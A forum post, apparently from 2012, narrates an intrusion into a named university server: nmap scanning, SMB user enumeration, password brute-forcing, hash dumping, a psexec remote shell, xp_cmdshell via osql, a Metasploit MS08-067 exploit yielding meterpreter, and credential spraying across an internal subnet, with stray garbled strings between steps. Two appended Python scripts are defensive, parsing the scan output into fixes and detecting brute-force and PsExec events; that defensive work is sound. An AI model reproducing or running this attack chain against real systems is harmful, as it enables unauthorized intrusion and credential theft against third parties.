nmap+msf intrusion into Guangxi Normal University

Posted 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// view the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
: }( q% w" r  R4 d0 F' H9 x
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "   // log in remotely as sa and run a command
7 {4 h$ f; c" |& x$ l
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
' V3 T) E% l$ ?/ u4 ?: S/ X
root@bt:~# msfconsole   // use the ms08-067 vulnerability in msf to overflow the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit

meterpreter >
Background session 2? [y/N]  (ctrl+z)

msf  exploit(ms08_067_netapi) > sessions -l
$ [( X2 H6 T1 H& h6 b; S( u; K& L. N: V6 L' v
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the captured hash to try logging in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf+nmap attack~~
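Everything the thread gets out of nmap (anonymous IPC$ read, guessable passwords, MS08-067 unpatched, LM hashes in the pwdump) is also exactly what a defender should be pulling out of the same scan. The script below is an added example, not code from the original post: it parses nmap's normal output for the smb-enum-shares, smb-brute, smb-check-vulns and smb-pwdump host-script blocks shown above and turns each weakness into a finding with a remediation. SAMPLE_NMAP_OUTPUT is constructed to mirror the thread; the IP, RIDs and hashes in it are placeholders, and the only thing assumed about nmap is its `| script:` / `|_ last line` block layout. The pwdump check goes a little beyond the thread: it flags any stored LM hash, and notes when the second half is the empty-string LM half (which means the password is 7 characters or fewer).

```python
"""Turn nmap NSE host-script output into remediation findings (added example)."""
import re
from dataclasses import dataclass

# Constructed sample mirroring the thread's output; IP/RIDs/hashes are placeholders.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for bogon (192.0.2.10)
Host script results:
| smb-enum-shares:
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-check-vulns:
|_  MS08-067: VULNERABLE
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|_test:1002 => 0123456789ABCDEFAAD3B435B51404EE:00112233445566778899AABBCCDDEEFF
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
"""

EMPTY_LM = "AAD3B435B51404EEAAD3B435B51404EE"   # LM hash of the empty string
SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3}
HOST_HEADER = re.compile(r"^Nmap scan report for (?:.*\()?([\d.]+)\)?")
SCRIPT_HEADER = re.compile(r"^\|_?\s*([a-z0-9-]+):\s*$")


@dataclass
class Finding:
    host: str
    severity: str
    title: str
    remediation: str


def parse_host_scripts(text):
    """Return {host_ip: {script_name: [body lines]}} from normal nmap output."""
    hosts, host, script = {}, None, None
    for raw in text.splitlines():
        m = HOST_HEADER.match(raw)
        if m:
            host, script = m.group(1), None
            hosts[host] = {}
            continue
        if host is None:
            continue
        if not raw.startswith("|"):          # port table, "Nmap done:", etc.
            script = None
            continue
        m = SCRIPT_HEADER.match(raw)
        if m:
            script = m.group(1)
            hosts[host][script] = []
        elif script is not None:
            # drop the "|" / "|_" prefix and indentation (a leading '_' in a name would go too)
            hosts[host][script].append(raw.lstrip("|_ ").rstrip())
    return hosts


def findings_for(host, scripts):
    out, share = [], None
    for line in scripts.get("smb-enum-shares", []):
        if line.startswith("Anonymous access:"):
            level = line.split(":", 1)[1].strip()
            if level != "<none>":
                out.append(Finding(host, "medium", f"share {share} allows anonymous {level}",
                                   "disable null sessions (RestrictAnonymous) and filter 139/445"))
        else:
            share = line                      # share names precede their attribute lines
    for line in scripts.get("smb-brute", []):
        m = re.match(r"(\S+?):(\S+) => Login was successful", line)
        if m:
            user, pw = m.groups()
            sev = "critical" if pw == "<blank>" or user.lower() == "administrator" else "high"
            out.append(Finding(host, sev, f"password guessed for {user}",
                               f"{pw!r} was accepted; reset it and enforce length/lockout policy"))
    for line in scripts.get("smb-check-vulns", []):
        m = re.match(r"(MS\d{2}-\d{3}): VULNERABLE", line)
        if m:
            out.append(Finding(host, "critical", f"{m.group(1)} unpatched",
                               "apply the bulletin; unauthenticated RCE over SMB"))
    for line in scripts.get("smb-pwdump", []):      # user:rid => LM:NT
        m = re.match(r"(\S+?):(\d+) => ([^:]+):(.+)", line)
        if not m:
            continue
        user, _rid, lm, _nt = m.groups()
        if lm.startswith("NO PASSWORD"):
            out.append(Finding(host, "critical", f"{user} has an empty password",
                               "set a password; this is what smb-brute found"))
        elif lm.upper() != EMPTY_LM:
            short = lm.upper().endswith(EMPTY_LM[16:])   # second half empty => <= 7 chars
            out.append(Finding(host, "medium", f"{user} has an LM hash stored"
                               + (" (password is 7 chars or fewer)" if short else ""),
                               "set NoLMHash and change the password so only the NT hash remains"))
    return out


def triage(text):
    """Parse scan text and return findings, most severe first."""
    findings = []
    for host, scripts in parse_host_scripts(text).items():
        findings.extend(findings_for(host, scripts))
    return sorted(findings, key=lambda f: SEVERITY_RANK[f.severity])


if __name__ == "__main__":
    for f in triage(SAMPLE_NMAP_OUTPUT):
        print(f"[{f.severity:8}] {f.host}: {f.title} -> {f.remediation}")
```

Feed it the `-oN` output of a scan with the same scripts and it produces one finding per host per weakness; on the sample it reports three criticals (blank Administrator password seen both by smb-brute and in the dump, MS08-067), one high and two mediums.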
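The two noisiest steps in the chain above, smb-brute hammering the SMB service and psexec.exe installing its service on the target, both leave obvious traces in the target's own event log. The detector below is an added example, not part of the original post. It runs over constructed Windows event records: it flags a source address that produces a burst of failed network logons inside a short window, flags a service-install event for PSEXESVC (the service name PsExec registers before it spawns the remote shell), and pairs each burst with the first later successful logon from the same source, which is the guessed credential. The dict record format, field names and thresholds are assumptions; the event ids used (4625 failed logon, 4624 successful logon, 7045 service installed) are the Vista-and-later ids, and a Windows 2000 host like the one in the thread would log 529/528 for the logon events instead.

```python
"""Detect SMB password bursts and PsExec service installs in event records (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta


def _failed_logons(src, start, count):
    """Constructed burst: `count` failed network logons (4625, type 3) one second apart."""
    t0 = datetime.fromisoformat(start)
    users = ["administrator", "test"]
    return [{"time": (t0 + timedelta(seconds=i)).isoformat(), "id": 4625,
             "logon_type": 3, "user": users[i % 2], "src": src}
            for i in range(count)]


# Constructed sample log: a 12-attempt burst, the guess that worked, the service
# install PsExec performs, and one unrelated typo from another workstation.
SAMPLE_EVENTS = _failed_logons("10.0.0.5", "2012-02-28T22:17:01", 12) + [
    {"time": "2012-02-28T22:17:20", "id": 4624, "logon_type": 3, "user": "test", "src": "10.0.0.5"},
    {"time": "2012-02-28T22:30:00", "id": 7045, "service": "PSEXESVC",
     "image": r"%SystemRoot%\PSEXESVC.exe"},
    {"time": "2012-02-28T23:00:00", "id": 4625, "logon_type": 3, "user": "bob", "src": "10.0.0.9"},
]


def _t(event):
    return datetime.fromisoformat(event["time"])


def detect_brute_force(events, threshold=10, window=timedelta(seconds=60)):
    """Flag a source once it has >= threshold failed network logons within `window`
    (sliding window over that source's sorted failure times); one alert per source."""
    by_src = defaultdict(list)
    for e in events:
        if e["id"] == 4625 and e.get("logon_type") == 3:
            by_src[e["src"]].append(_t(e))
    alerts = []
    for src, times in by_src.items():
        times.sort()
        lo = 0
        for hi, t in enumerate(times):
            while t - times[lo] > window:      # slide the window start forward
                lo += 1
            if hi - lo + 1 >= threshold:
                alerts.append({"src": src, "count": hi - lo + 1,
                               "first": times[lo].isoformat(), "last": t.isoformat()})
                break
    return alerts


def detect_psexec_service(events):
    """Service installs (7045) named PSEXESVC or whose image is PSEXESVC.exe;
    a renamed PsExec binary still drops that image name by default."""
    return [{"time": e["time"], "service": e.get("service", ""), "image": e.get("image", "")}
            for e in events
            if e["id"] == 7045 and (e.get("service", "").upper() == "PSEXESVC"
                                    or e.get("image", "").upper().endswith("PSEXESVC.EXE"))]


def success_after_burst(events, alerts, grace=timedelta(minutes=5)):
    """For each burst alert, the first successful network logon (4624, type 3) from the
    same source within `grace` after the burst: the credential that was guessed."""
    hits = []
    for a in alerts:
        last = datetime.fromisoformat(a["last"])
        for e in sorted(events, key=_t):
            if (e["id"] == 4624 and e.get("logon_type") == 3 and e.get("src") == a["src"]
                    and last <= _t(e) <= last + grace):
                hits.append({"src": a["src"], "user": e["user"], "time": e["time"]})
                break
    return hits


if __name__ == "__main__":
    bursts = detect_brute_force(SAMPLE_EVENTS)
    print("brute-force bursts:", bursts)
    print("guessed credentials:", success_after_burst(SAMPLE_EVENTS, bursts))
    print("psexec service installs:", detect_psexec_service(SAMPLE_EVENTS))
```

The threshold of ten failures in a minute is deliberately low because smb-brute's default wordlist produces far more than that in its 28-second run shown above; tune `threshold` and `window` to the normal failure rate of the environment before alerting on them.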